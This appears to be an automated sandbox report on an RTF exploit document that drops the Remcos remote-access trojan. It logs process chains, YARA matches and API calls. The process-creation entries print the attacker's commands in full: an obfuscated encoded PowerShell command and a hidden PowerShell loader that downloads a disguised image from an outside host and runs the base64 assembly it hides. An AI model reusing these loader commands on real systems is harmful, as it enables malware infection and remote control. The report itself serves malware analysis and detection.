TrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process Stats: CPU usage > 49%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00416702 ExitWindowsEx,LoadLibraryA,GetProcAddress,

12_2_00416702

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_002654A0	8_2_002654A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00265130	8_2_00265130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041F048	12_2_0041F048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043E00C	12_2_0043E00C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0045409A	12_2_0045409A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004380A8	12_2_004380A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00446130	12_2_00446130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0045326C	12_2_0045326C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043E23B	12_2_0043E23B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004272EB	12_2_004272EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00437426	12_2_00437426
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043E498	12_2_0043E498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004386B0	12_2_004386B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043783E	12_2_0043783E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044D889	12_2_0044D889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00433894	12_2_00433894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00427994	12_2_00427994
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00427AFD	12_2_00427AFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041DAB0	12_2_0041DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00437C73	12_2_00437C73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00426D5C	12_2_00426D5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043DDDD	12_2_0043DDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00435DA1	12_2_00435DA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00413F18	12_2_00413F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00436F2A	12_2_00436F2A

Source: ~WRF{06BA4240-94DA-46E6-9018-D99C6787D57E}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004346BE appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00434D70 appears 54 times

Source: SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.467ae68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.467ae68.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 3540, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winRTF@16/21@9/5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_004178A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

12_2_004178A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0040F3C2 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

12_2_0040F3C2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0041B3F6 FindResourceA,LoadResource,LockResource,SizeofResource,

12_2_0041B3F6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0041A998 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

12_2_0041A998

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.ShellCode.69.14498.22623.rtf

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-P0AEMX

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR708D.tmp

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs"

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Virustotal: Detection: 55%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WQQ.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WQQ.vbs"
